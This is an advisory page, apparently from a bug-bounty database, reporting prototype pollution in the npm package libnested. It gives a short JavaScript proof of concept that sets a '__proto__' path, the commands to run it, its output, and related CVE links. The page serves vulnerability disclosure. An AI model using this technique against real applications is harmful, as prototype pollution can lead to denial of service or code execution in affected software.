Lucene search
Ready-research1-NPM-LIBNESTEDHistoryJan 10, 2021 - 12:00 a.m.
Prototype Pollution in dominictarr/libnested
2021-01-1000:00:00
ready-research
www.huntr.dev
26
vulnerable software
proof of concept
npm
terminal command
bug bounty
security issue
EPSS
0.012
Percentile
85.8%
Description
libnested is vulnerable to Prototype Pollution.
Proof of Concept
- Create the following PoC file:
// poc.js
var libnested = require("libnested")
var obj = {}
console.log("Before : " + {}.polluted);
libnested.set(obj, ['__proto__','polluted'], 'Yes! Its Polluted');
console.log("After : " + {}.polluted);
- Execute the following commands in terminal:
npm i libnested # Install affected module
node poc.js # Run the PoC
- Check the Output:
Before : undefined
After : Yes! Its Polluted
Related
github
github
Prototype pollution vulnerability in 'libnested'
2021-10-12 16:27:02
Prototype Pollution in libnested
2022-03-18 00:01:11
prion
prion
Remote code execution
2020-12-29 18:15:00
Design/Logic Flaw
2022-03-17 12:15:00
cvelist
cvelist
CVE-2020-28283
2020-12-29 17:05:08
CVE-2022-25352 Prototype Pollution
2022-03-17 11:20:50
cve
cve
CVE-2020-28283
2020-12-29 18:15:12
CVE-2022-25352
2022-03-17 12:15:08
veracode
veracode
Denial Of Service (DoS)
2020-12-30 00:48:19
nvd
nvd
CVE-2020-28283
2020-12-29 18:15:12
CVE-2022-25352
2022-03-17 12:15:08
osv
osv
Prototype Pollution in libnested
2022-03-18 00:01:11
CVE-2022-25352
2022-03-17 12:15:08
CVE-2020-28283
2020-12-29 18:15:12